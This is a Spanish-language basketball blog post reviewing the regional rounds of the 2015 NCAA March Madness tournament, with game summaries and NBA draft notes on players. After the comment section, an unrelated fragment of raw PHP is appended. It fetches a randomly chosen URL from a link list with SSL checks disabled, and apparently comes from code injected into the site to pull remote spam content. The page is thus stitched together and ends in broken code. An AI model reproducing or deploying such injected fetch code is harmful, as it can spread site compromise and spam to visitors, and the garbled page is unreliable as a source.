March Madness 2015: Final Four

04 de April de 2015 por txusma

MIDWEST REGION (By Fernandisco)

En los “Sweet  16” de la Midwest no pudimos observar la igualdad que vimos después en el partido de los “Elite 8”. Tanto Notredame como Kentucky no dieron lugar a ninguna sorpresa y ambos consiguieron vencer sin problemas.

Notredame (3) venció a Wichita St (7) por 81-70 en un partido en el que nunca fueron por detrás. La dirección de Jerian Grant (posible lottery pick) con 11 asistencias fue clave, así como sus compañeros Demetrius Jackson (que apunta al draft de 2016) con 20 puntos  y Zach Auguste con  15 puntos 6 rebotes (posible 2ª ronda del draft si finalmente se presenta).

Por su parte, los chicos de Calipari arrasaron a West Virginia (5) y les dejaron en tan solo 39 puntos. Fueron superiores de principio a fin y en todas y cada una de las facestas del juego. No necesitaron siquiera una buena actuación del posible pick número 1 del draft, Karl Towns que en 13 minutos sólo fue capaz de anotar 1 tiro libre e hizo 3 faltas. El MVP del partido fue el posible mejor PF del draft, Trey Liles, con 14 puntos y 7 rebotes. También destacaron Willie Cauley-Stein con 8 puntos, 10 rebotes y el resto de jugadores que suenan para ser escogidos en el próximo draft: los hermanos Harrison, Devin Booker y Dakari Johnson superaron los 10 puntos.

Llegó  la final de la Midwest y cuando todo parecía que los Wildcats ganarían sin sudar demasiado ocurrió todo lo contrario. Notredame salió enchufado de la mano de Zach Auguste (20 puntos y 9 rebotes) y Jerian Grant (15 puntos, 6 asistencias), tanto que a falta de 4 minutos para el final ganaba por 5 puntos. Los Fighting Irish estaban muy cerca de de dar la sorpresa y evitar que Kentucky acabara la temporada sin derrotas, pero apareció Karl Towns metiendo 7 de los últimos 9 puntos de su equipo para remontar y clasificar a su equipo para la “Final Four”. El dominicano acabó con 23 puntos, 5 rebotes y 4 asistencias, firmando así uno de los mejores partidos de la fase final del campeonato. En los Wildcats destacaron también Devin Booker, con 10 puntos y Trey Liles con 9 puntos y 5 rebotes.

Ahora espera Wisconsin, con Kaminsky y Dekker. Una auténtica prueba de fuego para Karl-Towns y su candidatura como pick 1. 

WEST REGION (By Ruxixon)

Wisconsin no ha fallado en el momento de la verdad y ha eliminado a los 2 equipos más duros que desde el Selection Sunday sabía que se podían cruzar en su camino, UNC y Arizona.

En el Sweet Sixteen los Badgers ganaron 79 a 72 a los Tar Heels de la mítica universidad de North Carolina (4). Lo cierto es que he venido señalando que Wisconsin todavía no había dado lo mejor de sí y su arranque en este duelo siguió la misma tónica. North Carolina llevó la iniciativa del juego durante los primeros 30 minutos de partido apoyándose en Justine Jackson y Brice Johnson, que acabaron el partido con 15 puntos por cabeza. Lo peor para ellos es que no consiguieron fraguar una ventaja que pusiera las cosas muy difíciles a los de Bo Ryan y eso que la incidencia en el juego de Frank Kaminsky (19 puntos-8 rebotes), muy frio durante la primera parte -sólo 4 puntos en ese periodo-, no correspondió a lo que Wisconsin acostumbra. No obstante, Sam Dekker en uno de sus mejores partidos NCAA (23 puntos y 10 rebotes) sostuvo a unos Badgers que hicieron “clic” cuando North Carolina logró su máxima diferencia de 7 puntos (53-46 a falta de 11:11). Si bien Wisconsin no ha jugado al máximo de lo que pueden ofrecer sí que están demostrando algo que los equipos campeones tienen: saber jugar los momentos decisivos. En los 6 minutos siguientes consiguieron un parcial de 19-7 y Wisconsin, gracias a una extraordinaria defensa, se puso 5 arriba. Aun así UNC no quiso renunciar al upset y entraron en el último minuto con opciones pero como decimos, Wisconsin tiene una fiabilidad altísima y cerraron el partido sin fallar ni uno de los 8 tiros libres de los que dispusieron.

Arizona (2) se ganó el billete al Elite 8 dejando en el camino a la universidad de Xavier (6). Los Wildcats era muy favoritos y posiblemente ese exceso de presión mal manejada dio alas a Xavier. Personalizamos en TJ McConell (17 puntos, 7 rebotes y 5 asistencias), el líder del equipo. “Se puede decir que en la primera mitad estaba jugando para Xavier” dijo tras el choque y es que el base senior se fue al descanso con 2-7 en TC y 3 pérdidas. El triple, habitualmente una debilidad en las filas de Arizona, fue su mayor aliado durante ese momento de crisis. Por su parte Matt Stainbrook (17 puntos – 10 rebotes) permitió a los suyos soñar durante el partido hasta que Arizona despertó a falta de 7 minutos, encadenando un 19-7 para llegar al 68-60 final. Consiguieron anular a Stainbrook, y se jugó al ritmo que quiso un renacido McConnell que encontró en Kaleb Tarczewski (12-12) el socio perfecto. Stanley Johnson acabó con 12 puntos y 6 rebotes y fue el autor de un par de triples que fueron importantes en esa primera mitad. Rondae Hollis-Jefferson se quedó en 5 puntos pero consiguió 3 robos.

Llegamos al gran duelo, ese Arizona vs Wisconsin, también llamados “Frank & Dekker” y es que ambos estuvieron totalmente desatados. Como si de una herramienta de precisión se tratara un muy agresivo –en el sentido de impacto en el partido- Frank Kaminsky (29 puntos, 6 rebotes) tiró de Wisconsin en la primera parte y un genial Sam Dekker (27 puntos y 5 rebotes) –vaya Madness está haciendo la criatura- hizo lo suyo en la segunda. Conviene decir que la “Kaminskydependecia” de los primeros 20 minutos no fue del todo positiva y es que el resto del equipo cayó en la trampa defensiva de Arizona que sólo permitió 30 puntos a Wisconsin, lo que llevó el partido al terreno de los Wildcats que se fueron al descanso con 3 puntos de ventaja. En la faceta ofensiva Arizona tiró de su habitual insistencia de ir fuerte al aro y sumó mucho a partir de penetraciones, no sólo durante esos 20 minutos iniciales, en todo el partido. Tras el descanso y como si fuera parte de un plan perfectamente ejecutado por Bo Ryan, los Badgers rompieron el entramado defensivo de una Arizona excesivamente centrada en limitar a Kaminsly y a través de Sam Dekker y de secundarios como Gasser y Hayes crecieron ofensivamente, con una puntería letal desde el triple, abriendo brecha en el marcador y haciendo mella en la moral de Arizona, que se veía incapacitado para aguantar en el partido ante el gran acierto rival, a pesar de la buena aportación de Brandon Ashley (17 puntos) y Rondae Hollis-Jefferson (17 puntos y 8 rebotes). 55 puntos cayeron del lado de los Badgers en esa segunda mitad, quedando demostrado el fuerte contraste en la tónica del partido tras la reanudación. Ese 12 de 18 en triples pesó demasiado y al final, Wisconsin 85 – Arizona 78, y en el horizonte un duelo esperadísimo ante la Kentucky de Calipari.

Comentando en clave draft, Stanley Johnson jugó un mal partido, sin entrar en el mismo y con problemas de faltas. De los jugadores top del próximo draft el que peores sensaciones ha dado respecto a lo que se esperaba de él. Muy mal en la selección de tiro, con una carencia notable en el tiro exterior e inconexo en muchas fases de los partidos, aislándose del juego. No obstante tiene unas cualidades físicas brutales y en la faceta defensiva tiene una pinta tremenda pero hay lagunas bastante importantes.

EAST REGION (By Txusma)

Con la eliminación de Villanova y Virgina el teórico equipo más potente de la región eran los Oklahoma Sooners (3). Sin embargo, el choque frente Michigan State (7) se presentaba de todos menos sencillo a pesar de lo que hubiera decidido el comité el ‘Selection Sunday’. Y es que era muy complicado apostar en contra de un equipo que se había impuesto a Virginia con una defensa especialmente diseñada por Tom Izzo para la ocasión. El partido empezó con unos Sooners muy entonados que llegaron a escaparse de 10 puntos pero en seguida los Spartans se sacudieron los nervios iniciales y plantaron una defensa que ya no dejó anotar ni una canasta cómoda más en todo el partido. De todas maneras no fue hasta que faltaban 10 minutos para el final que Michigan State consiguió ponerse por delante. Esos últimos minutos fueron un toma y daca en el que destacaron Denzel Valentine y Travis Trice. A ninguno de los dos les tembló el pulso y los tiros libres acabaron decidiendo el partido a favor de los Spartans.

Por su parte, los Cardinals (4) se enfrentaban al equipo que se había cargado a los principales favoritos de la región, los Villanova Wildcats. Avisados, Terry Rozier, Montrezl Harrell y compañía no estaban dispuestos a confiarse ante NC State (8). C0mo preveían, el partido fue durísimo y los Wolfpacks llegaron a ponerse 8 arriba al principio de la 2ª parte. Sin embargo, Harrell, que superó durante todo el encuentro a los interiores rivales, metió de nuevo a los suyos en el partido y fueron Rozier y un desconocido Anton Gill los que abrieron la brecha definitiva a falta de 5 minutos para el final. Montrezl Harrell acabó con 24 puntos, 7 rebotes y 4 asistencias y Terry Rozier con 17 puntos, 14 rebotes y 4 asistencias.

El partido por un hueco en la Final Four no defraudó. Los Lousville Cardinal dominaban al descanso de 8 puntos pero a falta de 8 minutos par el final eran los Spartans los que se imponían de 6. De nuevo la defensa de los de Tom Izzo fue clave porque los Cardinals solo fueron capaces de anotar 5 canastas en juego en toda la segunda parte. De todas maneras, los de Pitino aguantaron e incluso pudieron llevarse el partido en el tiempo regular pero Mangok Mathiang falló un tiro libre que hubiera puesto a los suyos 1 arriba a falta de 5 segundos para el final. La prórroga empezó con un triple del ‘spartan’ Bryn Forbes que marcó todo el tiempo extra. Los Cardinals no pudieron sobreponerse y a pesar de llegar a ponerse a sólo 2 puntos a falta de 1 minuto, un palmeo de Branden Dawson certificó la victoria de unos Spartans por los que nadie daba un duro antes del torneo. Harrell anotó 16 puntos y cogió 9 rebotes y Rozier se fue a los 13 puntos, 8 rebotes, 3 asistencias y 4 robos.

Los Spartans se enfrentarán a los número 1 del resto de regiones en la Final Four pero ya han demostrado no tener miedo a nadie y poco respecto por las apuestas de principios de marzo. Están preparados para hacer saltar la banca.

SOUTH REGION (By Ruxixon)

Otro favorito que no ha fallado es Duke. El quinteto de “Coach K” está formado por 5 jugadores con unos roles muy definidos y eso se nota en su trayectoria en el March Madness, y de momento no han echado en falta el bajo rendimiento de Jahlil Okafor en esta fase del torneo ni una mayor profundidad en el roster, lo que se expresa con ese banquillo muy limitado en cuanto a minutaje de juego.

Dieron cuenta de Utah en el S16, en un partido que a pesar de no presentar un resultado demasiado amplio a favor de Duke (63-57) se puede decir que lo tuvieron controlado desde el minuto 8 de partido, cuando a través de Tyus Jones (15 puntos) y Justise Winslow (21 puntos, 10 rebotes) canalizaron la ofensiva del equipo. Por su parte Jahill Okafor (6 puntos, 8 rebotes, 4 pérdidas) estuvo muy bien defendido por Jakob Poetl (10 puntos, 8 rebotes) y Dallin Bachynski (11 puntos). El goteo de puntos iba llegando paulatinamente por ambos lados pero Utah siempre fue por detrás desde ese minuto incapaz de voltear el marcador. Quizás si no hubiera llegado una estricta 3ª falta sobre Delon Wright (10 puntos, 6 rebotes) –la mayor amenaza ofensiva de los Utes- cuando aún faltaban 5 minutos para finalizar el primer tiempo, Utah podía haber tenido algo más que decir. Brandon Taylor (15 puntos, 5 rebotes, 3 robos) lideró a su equipo en ausencia de Wright pero fue insuficiente ante un equipazo como el que tenían enfrente.

Por su parte Gonzaga acabó con el resurgir de UCLA (74-62) ante tantos críticos por su inclusión en el Gran Baile. No fue un partido demasiado lúcido para el espectador dado el pobre acierto de ambos conjuntos pero entre tanto desacierto aparece un brillante partido de Przemek Karnowski (18 puntos, 9 rebotes, 2 tapones), que dominó la pintura en los dos lados de la cancha y fue el gran artífice del triunfo de su equipo cuando tras la reanudación UCLA arrancó con un 6-0 que enseguida encontró respuesta en el 12-0 de Gonzaga a través de los puntos y rebotes del gigante polaco. El partido estaba roto y sólo un milagro que no llegó podía evitar que los Zags no se vieran las caras ante el ganador del Duke- Utah. Entre los angelinos Normal Powell 16 puntos y 5 rebotes, Isaac Hamilton 11-5 con 4 asistencias y un buen Tony Parker, todo un All-American que ha jugado muy bien en este torneo, 16 puntos y 11 rebotes. Por los ganadores, al margen de Karnowski, una noche más en la oficina de Domantas Sabonis 12-8, Byron Wesley 14-6 y Kyle Witjer 8 puntos, 10 rebotes y 4 asistencias.

Muchos analistas habían vaticinado que en cuanto Gonzaga se encontrara con un equipo serio no iba a competir con la suficiente dureza mental para tener un partido igualado. Ante Duke, en el partido del Elite 8, quizás haya que achacarles el no haber sabido jugar los minutos decisivos para resolver el partido a su favor, y es que el partido pasó del 50-53 favorable a Duke a falta de 6:40 para el final al definitivo 52-66. Y los 2 puntos cayeron desde la línea de personal. A veces los números no sirven para expresar determinados momentos de un partido pero esta vez sí hablan por sí solos, a los Zags les tembló la mano. Insistiendo en la importancia de ese saber manejar el tempo del duelo, en el cara a cara entre Kevin Pangos y Tyus Jones (15 puntos y 6 asistencias), bases de Gonzaga y Duke respectivamente, salió claramente ganador el segundo y dio una lección de lo que es un base de los de antes. Otro detalle más en este sentido y que habla muy bien de los Blue Devils son las 2 pérdidas en todo el partido, por las 13 del bando de Mark Few.

En otra de las batallas que iban a marcar el duelo, Gonzaga si cumplió los deberes sobre Okafor, aislándole en varios momentos del partido. El favorito a nº1 del draft acabó con 9 puntos y 8 rebotes, algo escaso para un jugador de su calibre, pero la verdad es que Karnowski y Sabonis trabajaron muy bien sobre él. Si acaso hay que achacarle al hijo del mítico jugador alguna falta tonta.

Justise Winslow aportó lo habitual en él, 16 puntos y 5 rebotes y junto a Matt Jones (16 puntos), que podemos decir que surgió como el factor X ante la poca aportación de Okafor, con una noche dulce en el tiro, y el ya comentado Tyus Jones fueron los puntales de Duke en su pase a la Final Four.

En el adiós de Gonzaga, buen Kyle Witjer (16 puntos y 5 rebotes) pero el mal partido de Pangos y Gary Bell (4 de 14 entre los dos) pesó demasiado como para pasar de ronda.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>